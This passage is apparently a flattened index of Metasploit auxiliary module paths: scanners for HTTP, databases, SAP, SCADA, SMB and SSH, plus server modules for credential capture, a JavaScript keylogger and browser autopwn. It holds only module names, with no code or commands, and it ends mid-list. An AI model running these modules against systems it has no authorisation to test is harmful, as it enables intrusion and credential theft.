| auxiliary/scanner/http/a10networks_ax_directory_traversal | auxiliary/scanner/http/accellion_fta_statecode_file_read | auxiliary/scanner/http/adobe_xml_inject | auxiliary/scanner/http/advantech_webaccess_login | auxiliary/scanner/http/allegro_rompager_misfortune_cookie | auxiliary/scanner/http/apache_activemq_source_disclosure | auxiliary/scanner/http/apache_activemq_traversal | auxiliary/scanner/http/apache_flink_jobmanager_traversal | auxiliary/scanner/http/apache_mod_cgi_bash_env | auxiliary/scanner/http/apache_nifi_login | auxiliary/scanner/http/apache_nifi_version | auxiliary/scanner/http/apache_normalize_path | auxiliary/scanner/http/apache_optionsbleed | auxiliary/scanner/http/apache_userdir_enum | auxiliary/scanner/http/appletv_login | auxiliary/scanner/http/atlassian_crowd_fileaccess | auxiliary/scanner/http/axis_local_file_include | auxiliary/scanner/http/axis_login | auxiliary/scanner/http/azure_ad_login | auxiliary/scanner/http/backup_file | auxiliary/scanner/http/barracuda_directory_traversal | auxiliary/scanner/http/bavision_cam_login | auxiliary/scanner/http/binom3_login_config_pass_dump | auxiliary/scanner/http/bitweaver_overlay_type_traversal | auxiliary/scanner/http/blind_sql_query | auxiliary/scanner/http/bmc_trackit_passwd_reset | auxiliary/scanner/http/brute_dirs | auxiliary/scanner/http/buffalo_login | auxiliary/scanner/http/buildmaster_login | auxiliary/scanner/http/caidao_bruteforce_login | auxiliary/scanner/http/canon_wireless | auxiliary/scanner/http/cassandra_web_file_read | auxiliary/scanner/http/cert | auxiliary/scanner/http/cgit_traversal | auxiliary/scanner/http/chef_webui_login | auxiliary/scanner/http/chromecast_webserver | auxiliary/scanner/http/chromecast_wifi | auxiliary/scanner/http/cisco_asa_asdm_bruteforce | auxiliary/scanner/http/cisco_asa_clientless_vpn | auxiliary/scanner/http/cisco_device_manager | auxiliary/scanner/http/cisco_directory_traversal | auxiliary/scanner/http/cisco_firepower_download | 
auxiliary/scanner/http/cisco_firepower_login | auxiliary/scanner/http/cisco_ios_auth_bypass | auxiliary/scanner/http/cisco_ironport_enum | auxiliary/scanner/http/cisco_nac_manager_traversal | auxiliary/scanner/http/cisco_ssl_vpn | auxiliary/scanner/http/cisco_ssl_vpn_priv_esc | auxiliary/scanner/http/citrix_bleed_cve_2023_4966 | auxiliary/scanner/http/citrix_dir_traversal | auxiliary/scanner/http/clansphere_traversal | auxiliary/scanner/http/cnpilot_r_web_login_loot | auxiliary/scanner/http/coldfusion_locale_traversal | auxiliary/scanner/http/coldfusion_version | auxiliary/scanner/http/concrete5_member_list | auxiliary/scanner/http/copy_of_file | auxiliary/scanner/http/crawler | auxiliary/scanner/http/dell_idrac | auxiliary/scanner/http/dicoogle_traversal | auxiliary/scanner/http/dir_listing | auxiliary/scanner/http/dir_scanner | auxiliary/scanner/http/dir_webdav_unicode_bypass | auxiliary/scanner/http/directadmin_login | auxiliary/scanner/http/dlink_dir_300_615_http_login | auxiliary/scanner/http/dlink_dir_615h_http_login | auxiliary/scanner/http/dlink_dir_session_cgi_http_login | auxiliary/scanner/http/dlink_user_agent_backdoor | auxiliary/scanner/http/dnalims_file_retrieve | auxiliary/scanner/http/docker_version | auxiliary/scanner/http/dolibarr_16_contact_dump | auxiliary/scanner/http/dolibarr_login | auxiliary/scanner/http/drupal_views_user_enum | auxiliary/scanner/http/ektron_cms400net | auxiliary/scanner/http/elasticsearch_memory_disclosure | auxiliary/scanner/http/elasticsearch_traversal | auxiliary/scanner/http/emby_ssrf_scanner | auxiliary/scanner/http/emby_version_ssrf | auxiliary/scanner/http/enum_wayback | auxiliary/scanner/http/epmp1000_dump_config | auxiliary/scanner/http/epmp1000_dump_hashes | auxiliary/scanner/http/epmp1000_get_chart_cmd_exec | auxiliary/scanner/http/epmp1000_ping_cmd_exec | auxiliary/scanner/http/epmp1000_reset_pass | auxiliary/scanner/http/epmp1000_web_login | auxiliary/scanner/http/error_sql_injection | 
auxiliary/scanner/http/es_file_explorer_open_port | auxiliary/scanner/http/etherpad_duo_login | auxiliary/scanner/http/exchange_proxylogon | auxiliary/scanner/http/exchange_web_server_pushsubscription | auxiliary/scanner/http/f5_bigip_virtual_server | auxiliary/scanner/http/f5_mgmt_scanner | auxiliary/scanner/http/file_same_name_dir | auxiliary/scanner/http/files_dir | auxiliary/scanner/http/fortimail_login_bypass_detection | auxiliary/scanner/http/fortinet_ssl_vpn | auxiliary/scanner/http/frontpage_credential_dump | auxiliary/scanner/http/frontpage_login | auxiliary/scanner/http/gavazzi_em_login_loot | auxiliary/scanner/http/git_scanner | auxiliary/scanner/http/gitlab_graphql_user_enum | auxiliary/scanner/http/gitlab_login | auxiliary/scanner/http/gitlab_user_enum | auxiliary/scanner/http/gitlab_version | auxiliary/scanner/http/glassfish_login | auxiliary/scanner/http/glassfish_traversal | auxiliary/scanner/http/goahead_traversal | auxiliary/scanner/http/grafana_plugin_traversal | auxiliary/scanner/http/groupwise_agents_http_traversal | auxiliary/scanner/http/host_header_injection | auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal | auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal | auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal | auxiliary/scanner/http/hp_imc_reportimgservlt_traversal | auxiliary/scanner/http/hp_imc_som_file_download | auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess | auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration | auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess | auxiliary/scanner/http/hp_sys_mgmt_login | auxiliary/scanner/http/http_header | auxiliary/scanner/http/http_hsts | auxiliary/scanner/http/http_login | auxiliary/scanner/http/http_put | auxiliary/scanner/http/http_sickrage_password_leak | auxiliary/scanner/http/http_traversal | auxiliary/scanner/http/http_version | auxiliary/scanner/http/httpbl_lookup | auxiliary/scanner/http/httpdasm_directory_traversal | 
auxiliary/scanner/http/icinga_static_library_file_directory_traversal | auxiliary/scanner/http/iis_internal_ip | auxiliary/scanner/http/iis_shortname_scanner | auxiliary/scanner/http/influxdb_enum | auxiliary/scanner/http/infovista_enum | auxiliary/scanner/http/intel_amt_digest_bypass | auxiliary/scanner/http/ipboard_login | auxiliary/scanner/http/jboss_status | auxiliary/scanner/http/jboss_vulnscan | auxiliary/scanner/http/jenkins_command | auxiliary/scanner/http/jenkins_enum | auxiliary/scanner/http/jenkins_login | auxiliary/scanner/http/jira_user_enum | auxiliary/scanner/http/joomla_api_improper_access_checks | auxiliary/scanner/http/joomla_bruteforce_login | auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner | auxiliary/scanner/http/joomla_gallerywd_sqli_scanner | auxiliary/scanner/http/joomla_pages | auxiliary/scanner/http/joomla_plugins | auxiliary/scanner/http/joomla_version | auxiliary/scanner/http/jupyter_login | auxiliary/scanner/http/kodi_traversal | auxiliary/scanner/http/limesurvey_zip_traversals | auxiliary/scanner/http/linknat_vos_traversal | auxiliary/scanner/http/linksys_e1500_traversal | auxiliary/scanner/http/litespeed_source_disclosure | auxiliary/scanner/http/log4shell_scanner | auxiliary/scanner/http/lucky_punch | auxiliary/scanner/http/majordomo2_directory_traversal | auxiliary/scanner/http/manageengine_desktop_central_login | auxiliary/scanner/http/manageengine_deviceexpert_traversal | auxiliary/scanner/http/manageengine_deviceexpert_user_creds | auxiliary/scanner/http/manageengine_securitymanager_traversal | auxiliary/scanner/http/mediawiki_svg_fileaccess | auxiliary/scanner/http/meteocontrol_weblog_extractadmin | auxiliary/scanner/http/mod_negotiation_brute | auxiliary/scanner/http/mod_negotiation_scanner | auxiliary/scanner/http/ms09_020_webdav_unicode_bypass | auxiliary/scanner/http/ms15_034_http_sys_memory_dump | auxiliary/scanner/http/mybook_live_login | auxiliary/scanner/http/nagios_xi_scanner | 
auxiliary/scanner/http/netdecision_traversal | auxiliary/scanner/http/netgear_sph200d_traversal | auxiliary/scanner/http/nginx_source_disclosure | auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess | auxiliary/scanner/http/novell_file_reporter_srs_fileaccess | auxiliary/scanner/http/novell_mdm_creds | auxiliary/scanner/http/ntlm_info_enumeration | auxiliary/scanner/http/octopusdeploy_login | auxiliary/scanner/http/onion_omega2_login | auxiliary/scanner/http/open_proxy | auxiliary/scanner/http/openmind_messageos_login | auxiliary/scanner/http/options | auxiliary/scanner/http/oracle_demantra_database_credentials_leak | auxiliary/scanner/http/oracle_demantra_file_retrieval | auxiliary/scanner/http/oracle_ilom_login | auxiliary/scanner/http/owa_ews_login | auxiliary/scanner/http/owa_iis_internal_ip | auxiliary/scanner/http/owa_login | auxiliary/scanner/http/phpmyadmin_login | auxiliary/scanner/http/pocketpad_login | auxiliary/scanner/http/prev_dir_same_name_file | auxiliary/scanner/http/radware_appdirector_enum | auxiliary/scanner/http/rails_json_yaml_scanner | auxiliary/scanner/http/rails_mass_assignment | auxiliary/scanner/http/rails_xml_yaml_scanner | auxiliary/scanner/http/rdp_web_login | auxiliary/scanner/http/replace_ext | auxiliary/scanner/http/rewrite_proxy_bypass | auxiliary/scanner/http/rfcode_reader_enum | auxiliary/scanner/http/rips_traversal | auxiliary/scanner/http/riverbed_steelhead_vcx_file_read | auxiliary/scanner/http/robots_txt | auxiliary/scanner/http/rpyc_rce | auxiliary/scanner/http/s40_traversal | auxiliary/scanner/http/sap_businessobjects_user_brute | auxiliary/scanner/http/sap_businessobjects_user_brute_web | auxiliary/scanner/http/sap_businessobjects_user_enum | auxiliary/scanner/http/sap_businessobjects_version_enum | auxiliary/scanner/http/scraper | auxiliary/scanner/http/sentry_cdu_enum | auxiliary/scanner/http/servicedesk_plus_traversal | auxiliary/scanner/http/sevone_enum | auxiliary/scanner/http/simple_webserver_traversal | 
auxiliary/scanner/http/smt_ipmi_49152_exposure | auxiliary/scanner/http/smt_ipmi_cgi_scanner | auxiliary/scanner/http/smt_ipmi_static_cert_scanner | auxiliary/scanner/http/smt_ipmi_url_redirect_traversal | auxiliary/scanner/http/soap_xml | auxiliary/scanner/http/sockso_traversal | auxiliary/scanner/http/softing_sis_login | auxiliary/scanner/http/splunk_web_login | auxiliary/scanner/http/springcloud_directory_traversal | auxiliary/scanner/http/springcloud_traversal | auxiliary/scanner/http/squid_pivot_scanning | auxiliary/scanner/http/squiz_matrix_user_enum | auxiliary/scanner/http/support_center_plus_directory_traversal | auxiliary/scanner/http/surgenews_user_creds | auxiliary/scanner/http/svn_scanner | auxiliary/scanner/http/svn_wcdb_scanner | auxiliary/scanner/http/sybase_easerver_traversal | auxiliary/scanner/http/symantec_brightmail_ldapcreds | auxiliary/scanner/http/symantec_brightmail_logfile | auxiliary/scanner/http/symantec_web_gateway_login | auxiliary/scanner/http/syncovery_linux_login | auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536 | auxiliary/scanner/http/synology_forget_passwd_user_enum | auxiliary/scanner/http/telerik_report_server_auth_bypass | auxiliary/scanner/http/thinvnc_traversal | auxiliary/scanner/http/titan_ftp_admin_pwd | auxiliary/scanner/http/title | auxiliary/scanner/http/tomcat_enum | auxiliary/scanner/http/tomcat_mgr_login | auxiliary/scanner/http/totaljs_traversal | auxiliary/scanner/http/tplink_traversal_noauth | auxiliary/scanner/http/trace | auxiliary/scanner/http/trace_axd | auxiliary/scanner/http/tvt_nvms_traversal | auxiliary/scanner/http/typo3_bruteforce | auxiliary/scanner/http/vcms_login | auxiliary/scanner/http/verb_auth_bypass | auxiliary/scanner/http/vhost_scanner | auxiliary/scanner/http/vicidial_multiple_sqli | auxiliary/scanner/http/vicidial_sql_enum_users_pass | auxiliary/scanner/http/wangkongbao_traversal | auxiliary/scanner/http/web_vulndb | auxiliary/scanner/http/webdav_internal_ip | 
auxiliary/scanner/http/webdav_scanner | auxiliary/scanner/http/webdav_website_content | auxiliary/scanner/http/webpagetest_traversal | auxiliary/scanner/http/wildfly_traversal | auxiliary/scanner/http/wordpress_content_injection | auxiliary/scanner/http/wordpress_cp_calendar_sqli | auxiliary/scanner/http/wordpress_ghost_scanner | auxiliary/scanner/http/wordpress_login_enum | auxiliary/scanner/http/wordpress_multicall_creds | auxiliary/scanner/http/wordpress_pingback_access | auxiliary/scanner/http/wordpress_scanner | auxiliary/scanner/http/wordpress_xmlrpc_login | auxiliary/scanner/http/wowza_streaming_engine_manager_login | auxiliary/scanner/http/wp_abandoned_cart_sqli | auxiliary/scanner/http/wp_arbitrary_file_deletion | auxiliary/scanner/http/wp_bulletproofsecurity_backups | auxiliary/scanner/http/wp_chopslider_id_sqli | auxiliary/scanner/http/wp_contus_video_gallery_sqli | auxiliary/scanner/http/wp_dukapress_file_read | auxiliary/scanner/http/wp_duplicator_file_read | auxiliary/scanner/http/wp_easy_wp_smtp | auxiliary/scanner/http/wp_email_sub_news_sqli | auxiliary/scanner/http/wp_fastest_cache_sqli | auxiliary/scanner/http/wp_gimedia_library_file_read | auxiliary/scanner/http/wp_learnpress_c_fields_sqli | auxiliary/scanner/http/wp_learnpress_sqli | auxiliary/scanner/http/wp_loginizer_log_sqli | auxiliary/scanner/http/wp_mobile_pack_info_disclosure | auxiliary/scanner/http/wp_mobileedition_file_read | auxiliary/scanner/http/wp_modern_events_calendar_sqli | auxiliary/scanner/http/wp_nextgen_galley_file_read | auxiliary/scanner/http/wp_paid_membership_pro_code_sqli | auxiliary/scanner/http/wp_registrationmagic_sqli | auxiliary/scanner/http/wp_secure_copy_content_protection_sqli | auxiliary/scanner/http/wp_simple_backup_file_read | auxiliary/scanner/http/wp_subscribe_comments_file_read | auxiliary/scanner/http/wp_total_upkeep_downloader | auxiliary/scanner/http/wp_woocommerce_payments_add_user | auxiliary/scanner/http/wp_wps_hide_login_revealer | 
auxiliary/scanner/http/xpath | auxiliary/scanner/http/yaws_traversal | auxiliary/scanner/http/zabbix_login | auxiliary/scanner/http/zenload_balancer_traversal | auxiliary/scanner/http/zenworks_assetmanagement_fileaccess | auxiliary/scanner/http/zenworks_assetmanagement_getconfig | . | ike (1) . | auxiliary/scanner/ike/cisco_ike_benigncertain | . | imap (1) . | auxiliary/scanner/imap/imap_version | . | ip (1) . | auxiliary/scanner/ip/ipidseq | . | ipmi (3) . | auxiliary/scanner/ipmi/ipmi_cipher_zero | auxiliary/scanner/ipmi/ipmi_dumphashes | auxiliary/scanner/ipmi/ipmi_version | . | jenkins (1) . | auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum | . | kademlia (1) . | auxiliary/scanner/kademlia/server_info | . | kerberos (1) . | auxiliary/scanner/kerberos/kerberos_login | . | ldap (1) . | auxiliary/scanner/ldap/ldap_login | . | llmnr (1) . | auxiliary/scanner/llmnr/query | . | lotus (3) . | auxiliary/scanner/lotus/lotus_domino_hashes | auxiliary/scanner/lotus/lotus_domino_login | auxiliary/scanner/lotus/lotus_domino_version | . | mdns (1) . | auxiliary/scanner/mdns/query | . | memcached (2) . | auxiliary/scanner/memcached/memcached_amp | auxiliary/scanner/memcached/memcached_udp_version | . | misc (22) . 
| auxiliary/scanner/misc/cctv_dvr_login | auxiliary/scanner/misc/cisco_smart_install | auxiliary/scanner/misc/clamav_control | auxiliary/scanner/misc/cups_browsed_info_disclosure | auxiliary/scanner/misc/dahua_dvr_auth_bypass | auxiliary/scanner/misc/dvr_config_disclosure | auxiliary/scanner/misc/easycafe_server_fileaccess | auxiliary/scanner/misc/freeswitch_event_socket_login | auxiliary/scanner/misc/ib_service_mgr_info | auxiliary/scanner/misc/ibm_mq_channel_brute | auxiliary/scanner/misc/ibm_mq_enum | auxiliary/scanner/misc/ibm_mq_login | auxiliary/scanner/misc/java_jmx_server | auxiliary/scanner/misc/java_rmi_server | auxiliary/scanner/misc/oki_scanner | auxiliary/scanner/misc/poisonivy_control_scanner | auxiliary/scanner/misc/raysharp_dvr_passwords | auxiliary/scanner/misc/rocketmq_version | auxiliary/scanner/misc/rosewill_rxs3211_passwords | auxiliary/scanner/misc/sercomm_backdoor_scanner | auxiliary/scanner/misc/sunrpc_portmapper | auxiliary/scanner/misc/zenworks_preboot_fileaccess | . | mongodb (1) . | auxiliary/scanner/mongodb/mongodb_login | . | motorola (1) . | auxiliary/scanner/motorola/timbuktu_udp | . | mqtt (1) . | auxiliary/scanner/mqtt/connect | . | msf (2) . | auxiliary/scanner/msf/msf_rpc_login | auxiliary/scanner/msf/msf_web_login | . | msmail (3) . | auxiliary/scanner/msmail/exchange_enum | auxiliary/scanner/msmail/host_id | auxiliary/scanner/msmail/onprem_enum | . | msmq (1) . | auxiliary/scanner/msmq/cve_2023_21554_queuejumper | . | mssql (5) . | auxiliary/scanner/mssql/mssql_hashdump | auxiliary/scanner/mssql/mssql_login | auxiliary/scanner/mssql/mssql_ping | auxiliary/scanner/mssql/mssql_schemadump | auxiliary/scanner/mssql/mssql_version | . | mysql (7) . 
| auxiliary/scanner/mysql/mysql_authbypass_hashdump | auxiliary/scanner/mysql/mysql_file_enum | auxiliary/scanner/mysql/mysql_hashdump | auxiliary/scanner/mysql/mysql_login | auxiliary/scanner/mysql/mysql_schemadump | auxiliary/scanner/mysql/mysql_version | auxiliary/scanner/mysql/mysql_writable_dirs | . | natpmp (1) . | auxiliary/scanner/natpmp/natpmp_portscan | . | nessus (4) . | auxiliary/scanner/nessus/nessus_ntp_login | auxiliary/scanner/nessus/nessus_rest_login | auxiliary/scanner/nessus/nessus_xmlrpc_login | auxiliary/scanner/nessus/nessus_xmlrpc_ping | . | netbios (1) . | auxiliary/scanner/netbios/nbname | . | nexpose (1) . | auxiliary/scanner/nexpose/nexpose_api_login | . | nfs (1) . | auxiliary/scanner/nfs/nfsmount | . | nntp (1) . | auxiliary/scanner/nntp/nntp_login | . | ntp (8) . | auxiliary/scanner/ntp/ntp_monlist | auxiliary/scanner/ntp/ntp_nak_to_the_future | auxiliary/scanner/ntp/ntp_peer_list_dos | auxiliary/scanner/ntp/ntp_peer_list_sum_dos | auxiliary/scanner/ntp/ntp_readvar | auxiliary/scanner/ntp/ntp_req_nonce_dos | auxiliary/scanner/ntp/ntp_reslist_dos | auxiliary/scanner/ntp/ntp_unsettrap_dos | . | openvas (3) . | auxiliary/scanner/openvas/openvas_gsad_login | auxiliary/scanner/openvas/openvas_omp_login | auxiliary/scanner/openvas/openvas_otp_login | . | oracle (12) . | auxiliary/scanner/oracle/emc_sid | auxiliary/scanner/oracle/isqlplus_login | auxiliary/scanner/oracle/isqlplus_sidbrute | auxiliary/scanner/oracle/oracle_hashdump | auxiliary/scanner/oracle/oracle_login | auxiliary/scanner/oracle/sid_brute | auxiliary/scanner/oracle/sid_enum | auxiliary/scanner/oracle/spy_sid | auxiliary/scanner/oracle/tnslsnr_version | auxiliary/scanner/oracle/tnspoison_checker | auxiliary/scanner/oracle/xdb_sid | auxiliary/scanner/oracle/xdb_sid_brute | . | pcanywhere (3) . | auxiliary/scanner/pcanywhere/pcanywhere_login | auxiliary/scanner/pcanywhere/pcanywhere_tcp | auxiliary/scanner/pcanywhere/pcanywhere_udp | . | pop3 (2) . 
| auxiliary/scanner/pop3/pop3_login | auxiliary/scanner/pop3/pop3_version | . | portmap (1) . | auxiliary/scanner/portmap/portmap_amp | . | portscan (5) . | auxiliary/scanner/portscan/ack | auxiliary/scanner/portscan/ftpbounce | auxiliary/scanner/portscan/syn | auxiliary/scanner/portscan/tcp | auxiliary/scanner/portscan/xmas | . | postgres (5) . | auxiliary/scanner/postgres/postgres_dbname_flag_injection | auxiliary/scanner/postgres/postgres_hashdump | auxiliary/scanner/postgres/postgres_login | auxiliary/scanner/postgres/postgres_schemadump | auxiliary/scanner/postgres/postgres_version | . | printer (9) . | auxiliary/scanner/printer/canon_iradv_pwd_extract | auxiliary/scanner/printer/printer_delete_file | auxiliary/scanner/printer/printer_download_file | auxiliary/scanner/printer/printer_env_vars | auxiliary/scanner/printer/printer_list_dir | auxiliary/scanner/printer/printer_list_volumes | auxiliary/scanner/printer/printer_ready_message | auxiliary/scanner/printer/printer_upload_file | auxiliary/scanner/printer/printer_version_info | . | quake (1) . | auxiliary/scanner/quake/server_info | . | rdp (3) . | auxiliary/scanner/rdp/cve_2019_0708_bluekeep | auxiliary/scanner/rdp/ms12_020_check | auxiliary/scanner/rdp/rdp_scanner | . | redis (3) . | auxiliary/scanner/redis/file_upload | auxiliary/scanner/redis/redis_login | auxiliary/scanner/redis/redis_server | . | rogue (2) . | auxiliary/scanner/rogue/rogue_recv | auxiliary/scanner/rogue/rogue_send | . | rservices (3) . | auxiliary/scanner/rservices/rexec_login | auxiliary/scanner/rservices/rlogin_login | auxiliary/scanner/rservices/rsh_login | . | rsync (1) . | auxiliary/scanner/rsync/modules_list | . | sage (1) . | auxiliary/scanner/sage/x3_adxsrv_login | . | sap (36) . 
| auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt | auxiliary/scanner/sap/sap_hostctrl_getcomputersystem | auxiliary/scanner/sap/sap_icf_public_info | auxiliary/scanner/sap/sap_icm_urlscan | auxiliary/scanner/sap/sap_mgmt_con_abaplog | auxiliary/scanner/sap/sap_mgmt_con_brute_login | auxiliary/scanner/sap/sap_mgmt_con_extractusers | auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints | auxiliary/scanner/sap/sap_mgmt_con_getenv | auxiliary/scanner/sap/sap_mgmt_con_getlogfiles | auxiliary/scanner/sap/sap_mgmt_con_getprocesslist | auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter | auxiliary/scanner/sap/sap_mgmt_con_instanceproperties | auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles | auxiliary/scanner/sap/sap_mgmt_con_listlogfiles | auxiliary/scanner/sap/sap_mgmt_con_startprofile | auxiliary/scanner/sap/sap_mgmt_con_version | auxiliary/scanner/sap/sap_router_info_request | auxiliary/scanner/sap/sap_router_portscanner | auxiliary/scanner/sap/sap_service_discovery | auxiliary/scanner/sap/sap_smb_relay | auxiliary/scanner/sap/sap_soap_bapi_user_create1 | auxiliary/scanner/sap/sap_soap_rfc_brute_login | auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec | auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec | auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing | auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence | auxiliary/scanner/sap/sap_soap_rfc_ping | auxiliary/scanner/sap/sap_soap_rfc_read_table | auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir | auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface | auxiliary/scanner/sap/sap_soap_rfc_sxpg_call_system_exec | auxiliary/scanner/sap/sap_soap_rfc_sxpg_command_exec | auxiliary/scanner/sap/sap_soap_rfc_system_info | auxiliary/scanner/sap/sap_soap_th_saprel_disclosure | auxiliary/scanner/sap/sap_web_gui_brute_login | . | scada (15) . 
| auxiliary/scanner/scada/bacnet_l3 | auxiliary/scanner/scada/digi_addp_reboot | auxiliary/scanner/scada/digi_addp_version | auxiliary/scanner/scada/digi_realport_serialport_scan | auxiliary/scanner/scada/digi_realport_version | auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess | auxiliary/scanner/scada/koyo_login | auxiliary/scanner/scada/modbus_banner_grabbing | auxiliary/scanner/scada/modbus_findunitid | auxiliary/scanner/scada/modbusclient | auxiliary/scanner/scada/modbusdetect | auxiliary/scanner/scada/moxa_discover | auxiliary/scanner/scada/pcomclient | auxiliary/scanner/scada/profinet_siemens | auxiliary/scanner/scada/sielco_winlog_fileaccess | . | sip (5) . | auxiliary/scanner/sip/enumerator | auxiliary/scanner/sip/enumerator_tcp | auxiliary/scanner/sip/options | auxiliary/scanner/sip/options_tcp | auxiliary/scanner/sip/sipdroid_ext_enum | . | smb (15) . | impacket (3) . | auxiliary/scanner/smb/impacket/dcomexec | auxiliary/scanner/smb/impacket/secretsdump | auxiliary/scanner/smb/impacket/wmiexec | . | auxiliary/scanner/smb/pipe_auditor | auxiliary/scanner/smb/pipe_dcerpc_auditor | auxiliary/scanner/smb/psexec_loggedin_users | auxiliary/scanner/smb/smb_enum_gpp | auxiliary/scanner/smb/smb_enumshares | auxiliary/scanner/smb/smb_enumusers | auxiliary/scanner/smb/smb_enumusers_domain | auxiliary/scanner/smb/smb_login | auxiliary/scanner/smb/smb_lookupsid | auxiliary/scanner/smb/smb_ms17_010 | auxiliary/scanner/smb/smb_uninit_cred | auxiliary/scanner/smb/smb_version | . | smtp (4) . | auxiliary/scanner/smtp/smtp_enum | auxiliary/scanner/smtp/smtp_ntlm_domain | auxiliary/scanner/smtp/smtp_relay | auxiliary/scanner/smtp/smtp_version | . | snmp (17) . 
| auxiliary/scanner/snmp/aix_version | auxiliary/scanner/snmp/arris_dg950 | auxiliary/scanner/snmp/brocade_enumhash | auxiliary/scanner/snmp/cisco_config_tftp | auxiliary/scanner/snmp/cisco_upload_file | auxiliary/scanner/snmp/cnpilot_r_snmp_loot | auxiliary/scanner/snmp/epmp1000_snmp_loot | auxiliary/scanner/snmp/netopia_enum | auxiliary/scanner/snmp/sbg6580_enum | auxiliary/scanner/snmp/snmp_enum | auxiliary/scanner/snmp/snmp_enum_hp_laserjet | auxiliary/scanner/snmp/snmp_enumshares | auxiliary/scanner/snmp/snmp_enumusers | auxiliary/scanner/snmp/snmp_login | auxiliary/scanner/snmp/snmp_set | auxiliary/scanner/snmp/ubee_ddw3611 | auxiliary/scanner/snmp/xerox_workcentre_enumusers | . | ssh (14) . | auxiliary/scanner/ssh/apache_karaf_command_execution | auxiliary/scanner/ssh/cerberus_sftp_enumusers | auxiliary/scanner/ssh/detect_kippo | auxiliary/scanner/ssh/eaton_xpert_backdoor | auxiliary/scanner/ssh/fortinet_backdoor | auxiliary/scanner/ssh/juniper_backdoor | auxiliary/scanner/ssh/karaf_login | auxiliary/scanner/ssh/libssh_auth_bypass | auxiliary/scanner/ssh/ssh_enum_git_keys | auxiliary/scanner/ssh/ssh_enumusers | auxiliary/scanner/ssh/ssh_identify_pubkeys | auxiliary/scanner/ssh/ssh_login | auxiliary/scanner/ssh/ssh_login_pubkey | auxiliary/scanner/ssh/ssh_version | . | ssl (4) . | auxiliary/scanner/ssl/bleichenbacher_oracle | auxiliary/scanner/ssl/openssl_ccs | auxiliary/scanner/ssl/openssl_heartbleed | auxiliary/scanner/ssl/ssl_version | . | steam (1) . | auxiliary/scanner/steam/server_info | . | telephony (1) . | auxiliary/scanner/telephony/wardial | . | telnet (8) . | auxiliary/scanner/telnet/brocade_enable_login | auxiliary/scanner/telnet/lantronix_telnet_password | auxiliary/scanner/telnet/lantronix_telnet_version | auxiliary/scanner/telnet/satel_cmd_exec | auxiliary/scanner/telnet/telnet_encrypt_overflow | auxiliary/scanner/telnet/telnet_login | auxiliary/scanner/telnet/telnet_ruggedcom | auxiliary/scanner/telnet/telnet_version | . | teradata (1) . 
| auxiliary/scanner/teradata/teradata_odbc_login | . | tftp (3) . | auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp | auxiliary/scanner/tftp/netdecision_tftp | auxiliary/scanner/tftp/tftpbrute | . | ubiquiti (1) . | auxiliary/scanner/ubiquiti/ubiquiti_discover | . | udp (1) . | auxiliary/scanner/udp/udp_amplification | . | upnp (2) . | auxiliary/scanner/upnp/ssdp_amp | auxiliary/scanner/upnp/ssdp_msearch | . | varnish (2) . | auxiliary/scanner/varnish/varnish_cli_file_read | auxiliary/scanner/varnish/varnish_cli_login | . | vmware (12) . | auxiliary/scanner/vmware/esx_fingerprint | auxiliary/scanner/vmware/vmauthd_login | auxiliary/scanner/vmware/vmauthd_version | auxiliary/scanner/vmware/vmware_enum_permissions | auxiliary/scanner/vmware/vmware_enum_sessions | auxiliary/scanner/vmware/vmware_enum_users | auxiliary/scanner/vmware/vmware_enum_vms | auxiliary/scanner/vmware/vmware_host_details | auxiliary/scanner/vmware/vmware_http_login | auxiliary/scanner/vmware/vmware_screenshot_stealer | auxiliary/scanner/vmware/vmware_server_dir_trav | auxiliary/scanner/vmware/vmware_update_manager_traversal | . | vnc (3) . | auxiliary/scanner/vnc/ard_root_pw | auxiliary/scanner/vnc/vnc_login | auxiliary/scanner/vnc/vnc_none_auth | . | voice (1) . | auxiliary/scanner/voice/recorder | . | vxworks (3) . | auxiliary/scanner/vxworks/urgent11_check | auxiliary/scanner/vxworks/wdbrpc_bootline | auxiliary/scanner/vxworks/wdbrpc_version | . | winrm (4) . | auxiliary/scanner/winrm/winrm_auth_methods | auxiliary/scanner/winrm/winrm_cmd | auxiliary/scanner/winrm/winrm_login | auxiliary/scanner/winrm/winrm_wql | . | wproxy (1) . | auxiliary/scanner/wproxy/att_open_proxy | . | wsdd (1) . | auxiliary/scanner/wsdd/wsdd_query | . | x11 (1) . | auxiliary/scanner/x11/open_x11 | . | . | server (46) . | capture (18) . 
| auxiliary/server/capture/drda | auxiliary/server/capture/ftp | auxiliary/server/capture/http | auxiliary/server/capture/http_basic | auxiliary/server/capture/http_javascript_keylogger | auxiliary/server/capture/http_ntlm | auxiliary/server/capture/imap | auxiliary/server/capture/ldap | auxiliary/server/capture/mssql | auxiliary/server/capture/mysql | auxiliary/server/capture/pop3 | auxiliary/server/capture/postgresql | auxiliary/server/capture/printjob_capture | auxiliary/server/capture/sip | auxiliary/server/capture/smb | auxiliary/server/capture/smtp | auxiliary/server/capture/telnet | auxiliary/server/capture/vnc | . | dns (2) . | auxiliary/server/dns/native_server | auxiliary/server/dns/spoofhelper | . | auxiliary/server/android_browsable_msf_launch | auxiliary/server/android_mercury_parseuri | auxiliary/server/browser_autopwn | auxiliary/server/browser_autopwn2 | auxiliary/server/dhclient_bash_env | auxiliary/server/dhcp | auxiliary/server/fakedns | auxiliary/server/ftp | auxiliary/server/http_ntlmrelay | auxiliary/server/icmp_exfil | auxiliary/server/jsse_skiptls_mitm_proxy | auxiliary/server/ldap | 